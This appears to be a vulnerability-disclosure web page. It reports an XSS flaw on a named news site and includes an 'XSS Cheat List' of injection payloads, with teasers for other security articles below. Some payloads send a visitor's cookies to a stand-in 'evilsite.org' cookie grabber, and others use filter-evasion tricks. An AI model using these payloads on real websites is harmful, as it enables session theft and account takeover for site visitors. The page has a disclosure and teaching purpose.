PlanetCreator has reported another critical XSS vulnerability on http://www.irrawaddy.org owned by Irrawaddy Publishing Group

These are some information from Vulneral Site http://www.irrawaddy.org

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy.


This vulnerability has been alerted to webmaster of http://www.irrawaddy.org

Vulnerability Link is as follow http://www.irrawaddy.org

We hope that your security staff will look into this issue and fix it as soon as possible.

Explore More

XSS Cheat List

<script>alert(1);</script> <script>alert('XSS');</script> <script src="http://www.evilsite.org/cookiegrabber.php"></script> <script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script> <scr<script>ipt>alert('XSS');</scr</script>ipt> <script>alert(String.fromCharCode(88,83,83))</script> <img src=foo.png onerror=alert(/xssed/) /> <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style> <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?> <marquee><script>alert('XSS')</script></marquee> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> "><script>alert(0)</script> <script src=http://yoursite.com/your_files.js></script> </title><script>alert(/xss/)</script> </textarea><script>alert(/xss/)</script>

Read More

Batten down the Hatches—10-Minute Tactics

The simplest way to defend your computer quickly against hackers is to use a firewall. So let’s look at your two fastest options. Either can be done in 10 minutes.Turn

Read More

Tracking Down A BotNet

This will not be very long, nor will I go into excessive amounts of detail into the tools and steps required. The purpose of this paper is simply to help

Read More